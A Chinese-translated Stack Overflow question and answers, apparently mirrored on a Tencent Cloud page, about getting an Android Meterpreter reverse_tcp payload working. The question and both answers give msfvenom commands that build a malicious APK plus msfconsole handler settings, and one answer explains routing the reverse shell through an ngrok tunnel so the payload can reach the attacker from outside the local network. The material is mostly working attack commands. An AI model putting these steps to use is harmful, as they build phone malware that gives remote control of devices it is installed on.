首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >Metasploit将打开Meterpreter,但shell没有响应

Metasploit将打开Meterpreter,但shell没有响应
EN

Stack Overflow用户
提问于 2021-05-05 09:59:51
回答 2查看 510关注 0票数 0

我使用以下命令创建了一个有效负载

msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 R > ANDROID.apk在apk上签名,把它发到我的手机上,打开msfconsole然后跑了

代码语言:javascript
复制
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.2
exploit

在这之后,我安装了apk并在我的手机上打开了它,得到了类似于下面的东西:

代码语言:javascript
复制
msf exploit(handler)  > [*] Sending stage (179267 bytes) to [target IP]

[*] Meterpreter session 1 opened  ( [attacker IP:port] -> [target IP: port] ) at 2021-6-03 17:54:27 -0300

我不能使用sessions -i 1 (如here),因为当我在控制台中输入内容时,按enter键什么也不做。我可以打开一个新的msfconsole,但它显示没有活动的会话。

EN

回答 2

Stack Overflow用户

发布于 2021-05-07 22:29:11

您必须在apk有效负载和Metasploit中设置LPORT才能建立反向连接。

示例:

代码语言:javascript
复制
msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4444 R > ANDROID.apk

Metasploit中的

代码语言:javascript
复制
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.2
set LPORT 4444
exploit
票数 1
EN

Stack Overflow用户

发布于 2021-08-09 09:58:00

如果您的电话和计算机不在同一网络中,则需要将端口转发到调制解调器。这对于将传入的ip地址从调制解调器转发到它自己的ip是必要的。您也可以从调制解调器的接口设置中执行此操作。you can see it here

2-您可以使用隧道服务,例如ngrok

使用起来非常简单

在terminal

  • paste token

  • ./ngrok tcp 4242

  • download

  • copy token

  • open ngrok目录(烧录kapatma)

  • sample payloads android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=11620 R > /root/FileName.apk (也会为您提供lport打开的隧道)

然后是msfconsole设置

代码语言:javascript
复制
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4242
exploit -j -z
票数 0
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/67394236

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档